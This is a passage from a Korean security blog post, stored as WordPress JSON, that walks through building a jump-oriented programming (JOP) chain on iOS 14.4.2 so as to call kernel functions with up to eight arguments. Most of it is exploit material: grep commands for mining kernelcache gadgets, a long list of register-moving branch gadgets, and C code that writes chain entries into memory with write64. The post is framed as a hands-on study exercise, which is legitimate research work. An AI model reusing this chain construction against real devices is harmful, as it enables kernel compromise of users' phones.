mov_x7_x16__br_x10 \uac00\uc82f\uc744 \ud1b5\ud574 jop\u2019s x7\uc774 \ubc31\uc5c5\ud574\ub454 x16 \ub808\uc9c0\uc2a4\ud130\uac12 \ub355\ubd84\uc5d0 \uc774\uc81c x7 \ub808\uc9c0\uc2a4\ud130\uc5d0 jop\u2019s x7 \ub808\uc9c0\uc2a4\ud130\uac12\uc73c\ub85c \uc9c0\uc815\ud574\uc904 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
current_page += 0x40; \n    write64(current_page, mov_x7_x16__br_x10);   \/\/x4\n    write64(current_page + 0x8, gadget_populate);           \/\/x0\n    write64(current_page + 0x10, current_page + 0x40);      \/\/x1 = x8\n    write64(current_page + 0x18, gadget_populate);      \/\/x2\n    write64(current_page + 0x20, 0);      \/\/x3\n<\/pre>\n\n\n\n
\uc774\ub7ec\ud55c \uac00\uc82f\ub4e4\uc740 \ub514\uc2a4\ud328\uce58 \uac00\uc82f \uc911 br x10, br x12 \uac00\uc82f\uc744 \ucc3e\uc544\ubcf4\uba74\uc11c \uc5bb\uac8c \ub41c \uacb0\uacfc\uc774\ub2e4.<\/p>\n\n\n\n
grep -E '\\\\bmov[[:space:]]+x[0-9]+,[[:space:]]*x[0-9]+ ; br x' kernelcache-gadgets.txt > mov_br.txt\ngrep -E -o '\\\\bmov[[:space:]]+x[0-9]+,[[:space:]]*x[0-9]+ ; br [^;]*' mov_br.txt | sort | uniq > mov_br2.txt\n\nmov x0, x12 ; br x10\nmov x1, x21 ; br x10\nmov x11, x19 ; br x10\nmov x12, x14 ; br x10\nmov x12, x9 ; br x10\nmov x15, x0 ; br x10\nmov x15, x16 ; br x10\nmov x15, x3 ; br x10\nmov x2, x1 ; br x10\nmov x3, x8 ; br x10\nmov x4, x3 ; br x10 \nmov x4, x8 ; br x10 \nmov x5, x15 ; br x10\nmov x5, x8 ; br x10\nmov x7, x16 ; br x10 \nmov x7, x8 ; br x10\nmov x8, x11 ; br x10\nmov x8, x9 ; br x10\nmov x9, x11 ; br x10\nmov x9, x4 ; br x10\nmov x9, x8 ; br x10\n\nmov x0, x11 ; br x12\nmov x0, x15 ; br x12\nmov x10, x0 ; br x12 \nmov x10, x11 ; br x12\nmov x10, x13 ; br x12\nmov x10, x19 ; br x12\nmov x10, x9 ; br x12\nmov x11, x10 ; br x12 \nmov x11, x14 ; br x12\nmov x11, x9 ; br x12\nmov x13, x14 ; br x12\nmov x13, x2 ; br x12 \nmov x14, x13 ; br x12\nmov x14, x16 ; br x12 \nmov x15, x16 ; br x12\nmov x16, x15 ; br x12 \nmov x3, x15 ; br x12\nmov x5, x0 ; br x12\nmov x8, x10 ; br x12 \nmov x9, x10 ; br x12 \nmov x9, x11 ; br x12\nmov x9, x17 ; br x12\nmov x9, x2 ; br x12\n<\/pre>\n\n\n\n
\uadf8 \ub2e4\uc74c\ubd80\ud130\ub294, x10 \ub808\uc9c0\uc2a4\ud130 \uac12\uc5d0 jop\u2019s x4 \ub808\uc9c0\uc2a4\ud130\uac12 \uc9c0\uc815. x13 \ub808\uc9c0\uc2a4\ud130 \uac12\uc5d0 jop\u2019s x4 \ub808\uc9c0\uc2a4\ud130 \uac12\uc744 \uc9c0\uc815\ud558\ub2e4\uac00\u2026 \uc5b4\ub5bb\uac8c \ud558\uba74 jop\u2019s x4\uac00 \ucee4\ub110 \ud638\ucd9c\uc5d0 \uadf8\ub300\ub85c \uc804\ub2ec\uc2dc\ud0ac \uc218 \uc788\uc744\uc9c0 \ucc3e\uc544\ubcf4\uc558\ub2e4.<\/p>\n\n\n\n
\ub54c\ub9c8\uce68 mov_x4_x13__br_x15 \uac00\uc82f\uc744 \ud1b5\ud574 x4 \ub808\uc9c0\uc2a4\ud130\ub85c \uadf8\ub300\ub85c \uc804\ub2ec\uc2dc\ud0ac \uc218 \uc788\uc5c8\uc9c0\ub9cc, \ubb38\uc81c\ub294 x15 \ub808\uc9c0\uc2a4\ud130\uc600\ub2e4.<\/p>\n\n\n\n
\uadf8\ub7ec\ub098, x15\ub808\uc9c0\uc2a4\ud130\ub294 mov_x15_x2__br_x3\uc5d0 \uc758\ud574 \uc784\uc758\ub85c \uc9c0\uc815\ud558\uc5ec populate\uc73c\ub85c \ubcf5\uadc0\ud560 \uc218 \uc788\ub294 \uac00\uc82f\uc774 \uc788\uae30 \ub54c\ubb38\uc5d0, \ubb38\uc81c\uc5c6\uc774 x15 \ub808\uc9c0\uc2a4\ud130\uc5d0\ub2e4\uac00 jop\u2019s addr\ub85c \uc9c0\uc815\ud558\uc5ec \ub05d\ub0b4 \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\uc2dc\ud0ac \uc218 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n
\/\/gadget_populate \ud568\uc218 \uc9c4\uc785, \ub2e4\uc74c \ub808\uc9c0\uc2a4\ud130 \ucc38\uc870. (\uc8fc\uc11d \ucc38\uace0) \n    \/\/\uc774\ud6c4\uc5d0 br x4 \ubb38\uc740 mov_x10_x0__br_x12\uc73c\ub85c \ubd84\uae30\n    current_page += 0x40; \n    write64(current_page, mov_x10_x0__br_x12);   \/\/x4\n    write64(current_page + 0x8, x4);           \/\/x0\n    write64(current_page + 0x10, current_page + 0x40);      \/\/x1 = x8\n    write64(current_page + 0x18, gadget_populate);      \/\/x2\n    write64(current_page + 0x20, 0);      \/\/x3\n\n    \/\/mov_x10_x0__br_x12\n    \/\/x10 = x0 (jop's x4), populate \ubcf5\uadc0\n\n    \/\/gadget_populate \ud568\uc218 \uc9c4\uc785, \ub2e4\uc74c \ub808\uc9c0\uc2a4\ud130 \ucc38\uc870. (\uc8fc\uc11d \ucc38\uace0) \n    \/\/\uc774\ud6c4\uc5d0 br x4 \ubb38\uc740 mov_x13_x2__br_x12\uc73c\ub85c \ubd84\uae30\n    current_page += 0x40; \n    write64(current_page, mov_x13_x2__br_x12);   \/\/x4\n    write64(current_page + 0x8, gadget_populate);           \/\/x0\n    write64(current_page + 0x10, current_page + 0x40);      \/\/x1 = x8\n    write64(current_page + 0x18, x4);      \/\/x2\n    write64(current_page + 0x20, 0);      \/\/x3\n\n    \/\/mov_x8_x10__br_x12 (\uc2e4\ud328)\n    \/\/x8 = x10 (jop's x4). populate \ubcf5\uadc0.\n    \/\/\uc774\ub294 \ucd94\ud6c4, mov_x4_x8__br_x10 \uc744 \ud1b5\ud574 x10\uc5d0\uc11c addr \ud638\ucd9c\ud560 \uc608\uc815.\n    \/\/\uadf8\ub7ec\ub098, \ub9c8\uc9c0\ub9c9 write64(current_page + 0x10, x1);      \/\/x1 = x8 \uc5d0\uc11c \ucda9\ub3cc\ud568.\n\n    \/\/mov_x13_x2__br_x12\n    \/\/x13 = x2 (jop's x4), populate \ubcf5\uadc0.\n\n    \/\/gadget_populate \ud568\uc218 \uc9c4\uc785, \ub2e4\uc74c \ub808\uc9c0\uc2a4\ud130 \ucc38\uc870. (\uc8fc\uc11d \ucc38\uace0) \n    \/\/\uc774\ud6c4\uc5d0 br x4 \ubb38\uc740 mov_x15_x2__br_x3\uc73c\ub85c \ubd84\uae30\n    current_page += 0x40; \n    write64(current_page, mov_x15_x2__br_x3);   \/\/x4\n    write64(current_page + 0x8, gadget_populate);           \/\/x0\n    write64(current_page + 0x10, current_page + 0x40);      \/\/x1 = x8\n    write64(current_page + 0x18, addr);      \/\/x2\n    write64(current_page + 0x20, gadget_populate);      \/\/x3\n    \n    \/\/mov_x15_x2__br_x3\n    \/\/x15 = x2 (jop's addr), populate \ubcf5\uadc0.\n\n    \/\/gadget_populate \ud568\uc218 \uc9c4\uc785, \ub2e4\uc74c \ub808\uc9c0\uc2a4\ud130 \ucc38\uc870. (\uc8fc\uc11d \ucc38\uace0) \n    current_page += 0x40; \n    write64(current_page, mov_x4_x13__br_x15);   \/\/x4\n    write64(current_page + 0x8, x0);           \/\/x0\n    write64(current_page + 0x10, x1);      \/\/x1 = x8\n    write64(current_page + 0x18, x2);      \/\/x2\n    write64(current_page + 0x20, x3);      \/\/x3\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
https:\/\/h4ck.kr\/?p=2452 \uc774\uc804 \uac8c\uc2dc\uae00\uc744 \ub2e4\uc2dc \ud68c\uc0c1\ud574\ubcf4\uba74, Userspace\uc5d0\uc11c IOConnectTrap6 \ud568\uc218\ub97c \ud638\ucd9c\ud558\uc5ec \ucd5c\ub300 7\uac1c\uc758 \uc778\uc790\ub85c \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\ud574\ub0bc \uc218 \uc788\uc5c8\ub2e4. \uadf8\ub7ec\ub098 \ubb3c\ub9ac\uba54\ubaa8\ub9ac\ub97c \ub9e4\ud551\ud558\ub294\ub370 \ud544\uc694\ud55c pmap_enter_options_addr \ud568\uc218\ub97c \ud638\ucd9c\ud560\ub824\uace0 \ud560\ub54c 8\uac1c\uc758 \uc778\uc790\ub97c \ud544\uc694\ub85c \ud788\ub294\ub370, \ucd5c\ub300 7\uac1c\uc758 \uc778\uc790\ubc16\uc5d0 \ubabb\ud558\ub294 \ud55c\uacc4\uac00 \uc788\ub2e4. \ub530\ub77c\uc11c, bazad\ub2d8\uc758 \ucd5c\ub300 14\uac1c\uc758 \uc778\uc790\ub85c \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\ud558\ub294 \uac8c\uc2dc\ubb3c\uacfc memctl \ud504\ub85c\uc81d\ud2b8, meowbrek2\uc5d0\uc11c \ud65c\uc6a9\ub41c jop \uac00\uc82f\ub4e4\uc744 \ucc38\uace0\ud558\uc5ec \ucd5c\ub300 8\uac1c\uc758 \uc778\uc790\uc640 \ud568\uaed8… \ub354 \ubcf4\uae30 »[\uc2e4\uc2b5] \uc544\uc774\ud3f08 14.4.2\uc5d0\uc11c JOP\uc744 \ud1b5\ud574 \ucd5c\ub300 8\uac1c\uc758 \uc778\uc790\ub85c \ucee4\ub110 \ud568\uc218 \ud638\ucd9c\ud574\uc11c 64\ube44\ud2b8 \ub9ac\ud134\uac12 \ubc1b\uc544\uc624\uae30<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[1],"tags":[11],"class_list":["post-3110","post","type-post","status-publish","format-standard","hentry","category-uncategorized","tag-ios"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3110"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3110\/revisions"}],"predecessor-version":[{"id":3111,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3110\/revisions\/3111"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}